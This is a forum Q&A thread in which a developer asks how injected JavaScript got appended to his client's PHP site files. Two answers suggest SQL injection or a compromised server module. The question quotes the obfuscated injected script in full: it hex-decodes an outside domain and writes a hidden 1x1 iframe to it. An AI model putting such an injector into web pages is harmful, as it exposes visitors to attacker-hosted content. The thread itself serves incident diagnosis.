client's website was attacked, eeek!

Question

Well, I guess this day had to come.

My client's website has been compromised and blacklisted by Google. When you load the main page this javascript gets automatically added to the bottom of the document:

<script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=382" style="visibility: hidden;"></'+str3+'rame>');</script></head><body><iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>

I haven't dissected it just yet but it's, quite obviously, an attacker trying to pose as google analytics. What I can't wrap my head around is that if I remove EVERY SINGLE LAST BIT of HTML from the main page, to the point that index.html is an empty document, the javascript STILL gets embedded. What gives? How is that possible?

updates

• The website is a very simple calendar application, runs on a $10/month godaddy unix account, MySQL, PHP.

• It is not a local thing specific to my computer as my client was the one that called me with the problem. Also happening on all the computers I have at home (4)

I'll go run a scan on the webserver...

source identified

Well, I found out where the javascript is coming from. I had foolishly only emptied the template.html file but still ran the script through my php templating system. Apparently, SOMEHOW the code above got appended to the bottom of my index.php and main.php files. How is this possible?

A little more background:

• It is a calendar application, as mentioned above, and it is used only by my client's small company. Login is required to do anything, and only 5 or so people have accounts. I can guarantee none of them would try any shenanigans. I obviously can't guarantee someone got a hold of their information and did try shenanigans, though.
• Sadly enough, I did make this website almost 4 years ago, so I am not exactly 100% confident I protected against everything kids are trying nowadays, but I still cannot understand how an attacker could have possibly gained access to the webserver to append this javascript to my php files.

Answer 1

Are you serving any content from a SQL database? It's possible that the compromise was a SQL injection attack and your site content in the database has been replaced/amended with this script/tag.

Answer 2

A rogue HTTP Module (in IIS), or whatever the equivalent is for apache could prepend, append, or perhaps even modify content for any HTTP request, even for static files. This would suggest that the server itself has been compromised.

EDIT: If you let us know what type of web server you're using, we'll be able to make more specific suggestions for troubleshooting.